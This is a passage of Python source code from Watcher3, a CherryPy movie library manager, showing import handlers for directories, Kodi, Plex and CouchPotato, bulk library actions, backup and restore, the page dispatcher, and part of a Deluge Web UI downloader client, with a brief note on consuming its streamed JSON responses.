metadata = Metadata.convert_to_db(metadata)
metadata['poster_path'] = p
metadata['resolution'] = r
metadata['size'] = os.path.getsize(path)
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
metadata['finished_file'] = path
if response['response'] == 'in_library':
metadata = {'title': metadata['title']}
response['movie'] = metadata
yield json.dumps(response)
except Exception as e:
logging.warning('Error gathering metadata.', exc_info=True)
yield json.dumps({'response': 'incomplete', 'movie': metadata})
continue
scan_library_directory._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def import_dir(self, movies, corrected_movies):
''' Imports list of movies in data
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yields dict ajax-style response
'''
logging.info('Adding directory scan movies to library.')
today = str(datetime.date.today())
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('{} corrected movies, gathering metadata.'.format(len(corrected_movies)))
for data in corrected_movies:
tmdbdata = TheMovieDatabase._search_tmdbid(data['tmdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['tmdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['tmdbid'])})
progress += 1
logging.info('Adding {} directory scan movies to library.'.format(len(movie_data)))
for movie in movie_data:
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Directory Import'
movie['finished_date'] = today
movie['id'] = movie['tmdbid']
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['title']))
logging.debug(movie)
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['title'])})
progress += 1
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir (str): base path
move_dir (str): child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Returns dict ajax-style response
'''
current_dir = current_dir.strip()
move_dir = move_dir.strip()
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['list'] = [i for i in os.listdir(new_path) if os.path.isdir(os.path.join(new_path, i)) and not i.startswith('.')]
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def update_metadata(self, imdbid, tmdbid=None):
''' Re-downloads metadata for imdbid
imdbid (str): imdbid of movie
tmdbid (str): tmdbid of movie <optional - default None>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
Returns dict ajax-style response
'''
r = Metadata.update(imdbid, tmdbid)
if r['response'] is True:
return {'response': True, 'message': _('Metadata updated.')}
else:
return r
@cherrypy.expose
@cherrypy.tools.json_out()
def single_movie_details(self, key, value):
''' Gets single movie's details from database
key (str): key for sql.get_movie_details
value (str): value for sql.get_movie_details
Returns dict
'''
return core.sql.get_movie_details(key, value)
@cherrypy.expose
@cherrypy.tools.json_out()
def set_movie_details(self, data):
''' Updates movie in database
data (dict): movie fields and values to update
data *must* include valid tmdbid
Returns dict
'''
data = json.loads(data)
tmdbid = data.pop('tmdbid')
if not core.sql.update_multiple_values('MOVIES', data, 'tmdbid', tmdbid):
return {'response': False, 'error': Errors.database_write}
else:
return {'response': True, 'message': 'Database Updated'}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url (str): url of kodi server
Calls Kodi import method to gather list.
Returns dict ajax-style response
'''
return library.ImportKodiLibrary.get_movies(url)
@cherrypy.expose
def import_kodi_movies(self, movies):
''' Imports list of movies from Kodi library
movies (str): json-formatted list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yields dict ajax-style response
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
logging.info('Adding {} Kodi movies to library.'.format(length))
for movie in movies:
if not movie['imdbid']:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format("NONE")})
progress += 1
continue
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if not tmdb_data or not tmdb_data[0].get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
tmdb_data = tmdb_data[0]
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['finished_file'] = (movie.get('finished_file') or '').strip()
movie['origin'] = 'Kodi Import'
response = Manage.add_movie(movie)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'title': movie['title'], 'imdbid': movie['imdbid'], 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_kodi_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def upload_plex_csv(self, file_input):
''' Receives upload of csv from browser
file_input (b'str): csv file to read
Reads/parses csv file into a usable dict
Returns dict ajax-style response
'''
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e:
logging.error('Unable to parse Plex CSV', exc_info=True)
return {'response': False, 'error': str(e)}
if csv_text:
return library.ImportPlexLibrary.read_csv(csv_text)
else:
return {'response': True, 'complete': [], 'incomplete': []}
@cherrypy.expose
def import_plex_csv(self, movies, corrected_movies):
''' Imports list of movies generated by csv import
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yields dict ajax-style response
'''
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('Adding {} Plex movies to library.'.format(len(corrected_movies)))
for movie in corrected_movies:
tmdbdata = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
movie['year'] = tmdbdata['release_date'][:4]
movie.update(tmdbdata)
movie_data.append(movie)
else:
logging.error(Errors.tmdb_not_found.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
logging.info('Adding {} Plex movies to library.'.format(length))
for movie in movie_data:
logging.info('Importing Plex movie {} {}'.format(movie.get('title', ''), movie.get('year', '')))
fm = False
if not movie.get('imdbid') and movie.get('tmdbid'):
tmdb_data = TheMovieDatabase._search_tmdbid(movie['tmdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
fm = True
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['tmdbid'])})
progress += 1
continue
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Plex Import'
if not movie.get('id'):
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
response = Manage.add_movie(movie, full_metadata=fm)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'error': response['error'], 'title': movie['title']})
progress += 1
continue
else:
logging.error(Errors.tmdb_not_found.format(movie['title']))
yield json.dumps({'response': False, 'progress': [progress, length], 'error': _('Unable to find IMDB ID for {} on TheMovieDB.').format(movie['title']), 'title': movie['title']})
progress += 1
continue
if fake_results:
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
if fake_results:
core.sql.write_search_results(fake_results)
import_plex_csv._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_cp_movies(self, url, apikey):
''' Gets movies from CP server
url (str): url to cp server
apikey (str): cp api key
Reads/parses cp api response
Returns dict ajax-style response
'''
url = '{}/api/{}/movie.list/'.format(url, apikey)
if not url.startswith('http'):
url = 'http://{}'.format(url)
return library.ImportCPLibrary.get_movies(url)
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
''' Imports movies from CP list to library
wanted (list): dicts of wanted movies
finished (list): dicts of finished movies
Yields dict ajax-style response
'''
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(wanted)))
for movie in wanted:
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
logging.info('Adding {} Finished CouchPotato movies to library.'.format(len(finished)))
for movie in finished:
movie['predb'] = 'found'
movie['status'] = 'Disabled'
movie['origin'] = 'CouchPotato Import'
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_backlog_search(self, movies):
''' Bulk manager action for backlog search
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk backlog search for {} movies.'.format(len(movies)))
ids = [i['imdbid'] for i in movies]
movies = [i for i in core.sql.get_user_movies() if i['imdbid'] in ids]
for i, movie in enumerate(movies):
title = movie['title']
year = movie['year']
imdbid = movie['imdbid']
quality = movie['quality']
logging.info('Performing backlog search for {} {}.'.format(title, year))
if not searcher.search(imdbid, title, year, quality):
response = {'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_backlog_search._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_update_metadata(self, movies):
''' Bulk manager action for metadata update
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk metadata update for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
r = Metadata.update(movie.get('imdbid'), movie.get('tmdbid'))
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_update_metadata._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_quality(self, movies, quality):
''' Bulk manager action to change movie quality profile
movies (list): dicts of movies, must contain keys imdbid
quality (str): quality to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting quality to {} for: {}'.format(quality, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_change_quality._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_reset_movies(self, movies):
''' Bulk manager action to reset movies
movies (list): dicts of movies, must contain key imdbid
Removes all search results
Updates database row with db_reset dict
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Resetting status for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
logging.debug('Resetting {}'.format(movie['imdbid']))
imdbid = movie['imdbid']
if not core.sql.purge_search_results(imdbid):
yield json.dumps({'response': False, 'error': _('Unable to purge search results.'), 'imdbid': imdbid, 'index': i + 1})
continue
db_reset = {'quality': config.default_profile(),
'status': 'Waiting',
'finished_date': None,
'finished_score': None,
'backlog': 0,
'finished_file': None,
'predb': None,
'predb_backlog': None
}
if not core.sql.update_multiple_values('MOVIES', db_reset, 'imdbid', imdbid):
yield json.dumps({'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1})
continue
yield json.dumps({'response': True, 'index': i + 1})
manager_reset_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_remove_movies(self, movies):
''' Bulk action to remove movies
movies (list): dicts of movies, must contain key imdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Removing {} movies from library.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.remove_movie(movie['imdbid'])
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield(json.dumps(response))
manager_remove_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def generate_stats(self):
''' Gets library stats for graphing page
Returns dict of library stats
'''
return Manage.get_stats()
@cherrypy.expose
@cherrypy.tools.json_out()
def create_backup(self):
''' Creates backup zip file ./watcher.zip
Returns dict ajax-style response
'''
logging.info('Creating backup of Watcher as {}'.format(os.path.join(core.PROG_PATH, 'watcher.zip')))
try:
backup.backup(require_confirm=False)
except Exception as e:
logging.error('Unable to create backup.', exc_info=True)
return {'response': False, 'error': str(e)}
return {'response': True, 'message': _('Backup created as {}').format(os.path.join(core.PROG_PATH, 'watcher.zip'))}
@cherrypy.expose
@cherrypy.tools.json_out()
def restore_backup(self, fileUpload):
logging.info('Restoring backup from uploaded zip.')
n = datetime.datetime.today().microsecond
tmp_zip = os.path.join(core.PROG_PATH, 'restore_{}.zip'.format(n))
try:
with open(tmp_zip, 'wb') as f:
f.seek(0)
f.write(fileUpload.file.read())
logging.info('Restore zip temporarily stored as {}.'.format(tmp_zip))
backup.restore(require_confirm=False, file=tmp_zip)
logging.info('Removing temporary zip {}'.format(tmp_zip))
os.unlink(tmp_zip)
except Exception as e:
logging.error('Unable to restore backup.', exc_info=True)
return {'response': False}
threading.Timer(3, core.restart).start()
return {'response': True}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_task_execute(self, name):
''' Calls task's now() function to execute task now
name (str): name of scheduled task to run
Response includes core.NOTIFICATIONS so the browser can display any
notifications generated during the task.
Returns dict ajax-style response
'''
try:
logging.info('Manually executing task {}.'.format(name))
task = core.scheduler_plugin.task_list[name]
task.now()
le = task.last_execution
return {'response': True, 'message': _('Finished task {}.').format(name), 'last_execution': le, 'notifications': core.NOTIFICATIONS}
except Exception as e:
return {'response': False, 'error': str(e)}
```
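The streaming handlers above (those tagged with `_cp_config = {'response.stream': True, 'tools.gzip.on': False}`) yield one complete JSON document per progress step rather than a single JSON array. A minimal client-side sketch, assuming the `requests` library, a hypothetical endpoint URL, and that each server-side yield arrives as its own chunk (which disabling gzip makes likely):

```python
import json
import requests

def consume_stream(url, payload):
    # Each chunk is assumed to be one json.dumps() string produced by a
    # single yield in the handler; parse and report progress as it arrives.
    with requests.post(url, data=payload, stream=True) as r:
        for chunk in r.iter_content(chunk_size=None):
            if not chunk:
                continue
            msg = json.loads(chunk.decode('utf-8'))
            print(msg.get('progress'), msg.get('response'), msg.get('error'))

# consume_stream('http://localhost:9090/ajax/import_dir', {...})  # hypothetical URL/payload
```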
#### File: Watcher3/core/app.py
```python
import cherrypy
import core
from core import ajax, scheduler, plugins, localization, api
from core.auth import AuthController
from core.postprocessing import Postprocessing
import os
import json
from mako.template import Template
import sys
import time
locale_dir = os.path.join(core.PROG_PATH, 'locale')
class App(object):
@cherrypy.expose
def __init__(self):
self.auth = AuthController()
self.postprocessing = Postprocessing()
self.api = api.API()
if core.CONFIG['Server']['authrequired']:
self._cp_config = {
'auth.require': []
}
self.ajax = ajax.Ajax()
localization.get()
localization.install()
# point server toward custom 404
cherrypy.config.update({
'error_page.404': self.error_page_404
})
# Lock down settings if required
if core.CONFIG['Server']['adminrequired']:
self.settings._cp_config['auth.require'] = [core.auth.is_admin]
if core.CONFIG['Server']['checkupdates']:
scheduler.AutoUpdateCheck.update_check(install=False)
def https_redirect(self=None):
''' Cherrypy tool to redirect http:// to https://
Use as before_handler when https is enabled for the server.
Enable in config as {'tools.https_redirect.on': True}
'''
if cherrypy.request.scheme == 'http':
raise cherrypy.HTTPRedirect(cherrypy.url().replace('http:', 'https:'), status=302)
cherrypy.tools.https_redirect = cherrypy.Tool('before_handler', https_redirect)
def defaults(self):
defaults = {'head': self.head(),
'navbar': self.nav_bar(current=sys._getframe().f_back.f_code.co_name),
'url_base': core.URL_BASE
}
return defaults
# All dispatching methods from here down
status_template = Template(filename='templates/library/status.html', module_directory=core.MAKO_CACHE)
manage_template = Template(filename='templates/library/manage.html', module_directory=core.MAKO_CACHE)
import_template = Template(filename='templates/library/import.html', module_directory=core.MAKO_CACHE)
couchpotato_template = Template(filename='templates/library/import/couchpotato.html', module_directory=core.MAKO_CACHE)
kodi_template = Template(filename='templates/library/import/kodi.html', module_directory=core.MAKO_CACHE)
plex_template = Template(filename='templates/library/import/plex.html', module_directory=core.MAKO_CACHE)
directory_template = Template(filename='templates/library/import/directory.html', module_directory=core.MAKO_CACHE)
stats_template = Template(filename='templates/library/stats.html', module_directory=core.MAKO_CACHE)
add_movie_template = Template(filename='templates/add_movie.html', module_directory=core.MAKO_CACHE)
server_template = Template(filename='templates/settings/server.html', module_directory=core.MAKO_CACHE)
search_template = Template(filename='templates/settings/search.html', module_directory=core.MAKO_CACHE)
quality_template = Template(filename='templates/settings/quality.html', module_directory=core.MAKO_CACHE)
indexers_template = Template(filename='templates/settings/indexers.html', module_directory=core.MAKO_CACHE)
downloader_template = Template(filename='templates/settings/downloader.html', module_directory=core.MAKO_CACHE)
postprocessing_template = Template(filename='templates/settings/postprocessing.html', module_directory=core.MAKO_CACHE)
plugins_template = Template(filename='templates/settings/plugins.html', module_directory=core.MAKO_CACHE)
logs_template = Template(filename='templates/settings/logs.html', module_directory=core.MAKO_CACHE)
system_template = Template(filename='templates/settings/system.html', module_directory=core.MAKO_CACHE)
shutdown_template = Template(filename='templates/system/shutdown.html', module_directory=core.MAKO_CACHE)
restart_template = Template(filename='templates/system/restart.html', module_directory=core.MAKO_CACHE)
update_template = Template(filename='templates/system/update.html', module_directory=core.MAKO_CACHE)
fourohfour_template = Template(filename='templates/404.html', module_directory=core.MAKO_CACHE)
head_template = Template(filename='templates/head.html', module_directory=core.MAKO_CACHE)
navbar_template = Template(filename='templates/navbar.html', module_directory=core.MAKO_CACHE)
@cherrypy.expose
def default(self):
return self.library('status')
@cherrypy.expose
def _test(self):
return 'This is not the page you are looking for.'
@cherrypy.expose
def library(self, *path):
page = path[0] if len(path) > 0 else 'status'
if page == 'status':
mc, fc = core.sql.get_library_count()
return App.status_template.render(profiles=core.CONFIG['Quality']['Profiles'].keys(), movie_count=mc, finished_count=fc, **self.defaults())
elif page == 'manage':
movies = core.sql.get_user_movies()
return App.manage_template.render(movies=movies, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif page == 'import':
subpage = path[1] if len(path) > 1 else None
if not subpage:
return App.import_template.render(**self.defaults())
elif subpage == 'couchpotato':
return App.couchpotato_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif subpage == 'kodi':
return App.kodi_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif subpage == 'plex':
return App.plex_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), **self.defaults())
elif subpage == 'directory':
try:
start_dir = os.path.expanduser('~')
file_list = [i for i in os.listdir(start_dir) if os.path.isdir(os.path.join(start_dir, i)) and not i.startswith('.')]
except Exception as e:
start_dir = core.PROG_PATH
file_list = [i for i in os.listdir(start_dir) if os.path.isdir(os.path.join(start_dir, i)) and not i.startswith('.')]
file_list.append('..')
return App.directory_template.render(sources=core.SOURCES, profiles=core.CONFIG['Quality']['Profiles'].keys(), current_dir=start_dir, file_list=file_list, **self.defaults())
else:
return self.error_page_404()
elif page == 'stats':
App.stats_template = Template(filename='templates/library/stats.html', module_directory=core.MAKO_CACHE)
return App.stats_template.render(**self.defaults())
else:
return self.error_page_404()
@cherrypy.expose
def add_movie(self):
return App.add_movie_template.render(profiles=[(k, v.get('default', False)) for k, v in core.CONFIG['Quality']['Profiles'].items()], **self.defaults())
@cherrypy.expose
def settings(self, *path):
page = path[0] if len(path) > 0 else 'server'
if page == 'server':
themes = [i[:-4] for i in os.listdir('static/css/themes/') if i.endswith('.css') and os.path.isfile(os.path.join(core.PROG_PATH, 'static/css/themes', i))]
return App.server_template.render(config=core.CONFIG['Server'], themes=themes, version=core.CURRENT_HASH or '', languages=core.LANGUAGES.keys(), **self.defaults())
elif page == 'search':
return App.search_template.render(config=core.CONFIG['Search'], **self.defaults())
elif page == 'quality':
return App.quality_template.render(config=core.CONFIG['Quality'], sources=core.SOURCES, **self.defaults())
elif page == 'indexers':
return App.indexers_template.render(config=core.CONFIG['Indexers'], **self.defaults())
elif page == 'downloader':
return App.downloader_template.render(config=core.CONFIG['Downloader'], **self.defaults())
elif page == 'postprocessing':
return App.postprocessing_template.render(config=core.CONFIG['Postprocessing'], os=core.PLATFORM, **self.defaults())
elif page == 'plugins':
plugs = plugins.list_plugins()
return App.plugins_template.render(config=core.CONFIG['Plugins'], plugins=plugs, **self.defaults())
elif page == 'logs':
logdir = os.path.join(core.PROG_PATH, core.LOG_DIR)
logfiles = [i for i in os.listdir(logdir) if os.path.isfile(os.path.join(logdir, i))]
return App.logs_template.render(logdir=logdir, logfiles=logfiles, **self.defaults())
elif page == 'download_log':
if len(path) > 1:
log_path = os.path.join(os.path.abspath(core.LOG_DIR), path[1])
return cherrypy.lib.static.serve_file(log_path, 'application/x-download', 'attachment')
else:
raise cherrypy.HTTPError(400)
elif page == 'system':
tasks = {}
for name, obj in core.scheduler_plugin.task_list.items():
tasks[name] = {'name': name,
'interval': obj.interval,
'last_execution': obj.last_execution,
'enabled': obj.timer.is_alive() if obj.timer else False}
system = {'database': {'file': core.DB_FILE,
'size': os.path.getsize(core.DB_FILE) / 1024
},
'config': {'file': core.CONF_FILE},
'system': {'path': core.PROG_PATH,
'arguments': sys.argv,
'version': sys.version[:5]}
}
t = int(time.time())
dt = time.strftime('%a, %B %d, %Y %H:%M:%S %z', time.localtime(t))
return App.system_template.render(config=core.CONFIG['System'], tasks=json.dumps(tasks), system=system, server_time=[dt, t], **self.defaults())
else:
return self.error_page_404()
settings._cp_config = {}
@cherrypy.expose
def system(self, *path, **kwargs):
if len(path) == 0:
return self.error_page_404()
page = path[0]
if page == 'shutdown':
return App.shutdown_template.render(**self.defaults())
if page == 'restart':
return App.restart_template.render(**self.defaults())
if page == 'update':
return App.update_template.render(updating=core.UPDATING, **self.defaults())
@cherrypy.expose
def error_page_404(self, *args, **kwargs):
return App.fourohfour_template.render(**self.defaults())
def head(self):
return App.head_template.render(url_base=core.URL_BASE, uitheme=core.CONFIG['Server']['uitheme'], notifications=json.dumps([i for i in core.NOTIFICATIONS if i is not None]), language=core.LANGUAGE)
def nav_bar(self, current=None):
username = cherrypy.session.get(core.SESSION_KEY)
return App.navbar_template.render(url_base=core.URL_BASE, current=current, username=username)
```
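One detail worth noting in `App`: the Mako templates are compiled once at class-definition time and reused across requests, while the `https_redirect` tool is registered globally and enabled per-path. A minimal sketch of switching that tool on when mounting the app; the mount point and config dict are assumptions, not Watcher3's actual startup code:

```python
import cherrypy

# Hypothetical mount config; the tool itself is registered in App above
# as cherrypy.tools.https_redirect.
app_config = {
    '/': {
        'tools.https_redirect.on': True,  # redirect http:// -> https:// before each handler
    }
}
# cherrypy.quickstart(App(), '/', config=app_config)
```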
#### File: core/downloaders/DelugeWeb.py
```python
import logging
import json
import re
import core
from core.helpers import Torrent, Url
cookie = None
command_id = 0
label_fix = re.compile('[^a-z0-9_-]')
headers = {'Content-Type': 'application/json', 'User-Agent': 'Watcher'}
logging = logging.getLogger(__name__)
def test_connection(data):
''' Tests connectivity to deluge web client
data: dict of deluge server information
Return True on success or str error message on failure
'''
logging.info('Testing connection to Deluge Web UI.')
host = data['host']
port = data['port']
password = data['pass']
url = '{}:{}/json'.format(host, port)
return _login(url, password)
def add_torrent(data):
''' Adds torrent or magnet to deluge web api
data (dict): torrent/magnet information
Adds torrents to default/path/<category>
Returns dict ajax-style response
'''
global command_id
logging.info('Sending torrent {} to Deluge Web UI.'.format(data['title']))
conf = core.CONFIG['Downloader']['Torrent']['DelugeWeb']
host = conf['host']
port = conf['port']
url = '{}:{}/json'.format(host, port)
priority_keys = {
'Low': 64,
'Normal': 128,
'High': 255,
}
if cookie is None:
if _login(url, conf['pass']) is not True:
return {'response': False, 'error': 'Incorrect username or password.'}
download_dir = _get_download_dir(url)
if not download_dir:
return {'response': False, 'error': 'Unable to get path information.'}
# if we got download_dir we can connect.
download_dir = '{}/{}'.format(download_dir, conf['category'])
# if file is a torrent, have deluge download it to a tmp dir
if data['type'] == 'torrent':
tmp_torrent_file = _get_torrent_file(data['torrentfile'], url)
if tmp_torrent_file['response'] is True:
torrent = {'path': tmp_torrent_file['torrentfile'], 'options': {}}
else:
return {'response': False, 'error': tmp_torrent_file['error']}
else:
torrent = {'path': data['torrentfile'], 'options': {}}
torrent['options']['add_paused'] = conf['addpaused']
torrent['options']['download_location'] = download_dir
torrent['options']['priority'] = priority_keys[conf['priority']]
command = {'method': 'web.add_torrents',
'params': [[torrent]],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(url, post_data=post_data, headers=headers)
response = json.loads(response.text)
if response['result'] is True:
downloadid = Torrent.get_hash(data['torrentfile'])
else:
return {'response': False, 'error': response['error']}
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Delugeweb add_torrent', exc_info=True)
return {'response': False, 'error': str(e)}
_set_label(downloadid, conf['category'], url)
return {'response': True, 'downloadid': downloadid}
def _set_label(torrent, label, url):
''' Sets label for download
torrent: str hash of torrent to apply label
label: str name of label to apply
url: str url of deluge web interface
Returns bool
'''
global command_id
label = label_fix.sub('', label.lower()).replace(' ', '')
logging.info('Applying label {} to torrent {} in Deluge Web UI.'.format(label, torrent))
command = {'method': 'label.get_labels',
'params': [],
'id': command_id
}
command_id += 1
try:
response = Url.open(url, post_data=json.dumps(command), headers=headers).text
deluge_labels = json.loads(response).get('result') or []
except Exception as e:
logging.error('Unable to get labels from Deluge Web UI.', exc_info=True)
return False
if label not in deluge_labels:
logging.info('Adding label {} to Deluge.'.format(label))
command = {'method': 'label.add',
'params': [label],
'id': command_id
}
command_id += 1
try:
sc = Url.open(url, post_data=json.dumps(command), headers=headers).status_code
if sc != 200:
logging.error('Deluge Web UI response {}.'.format(sc))
return False
except Exception as e:
logging.error('Delugeweb get_labels.', exc_info=True)
return False
try:
command = {'method': 'label.set_torrent',
'params': [torrent.lower(), label],
'id': command_id
}
command_id += 1
sc = Url.open(url, post_data=json.dumps(command), headers=headers).status_code
if sc != 200:
logging.error('Deluge Web UI response {}.'.format(sc))
return False
except Exception as e:
logging.error('Delugeweb set_torrent.', exc_info=True)
return False
return True
def _get_torrent_file(torrent_url, deluge_url):
global command_id
command = {'method': 'web.download_torrent_from_url',
'params': [torrent_url],
'id': command_id
}
command_id += 1
post_data = json.dumps(command)
headers['cookie'] = cookie
try:
response = Url.open(deluge_url, post_data=post_data, headers=headers)
response = json.loads(response.text)
if response['error'] is None:
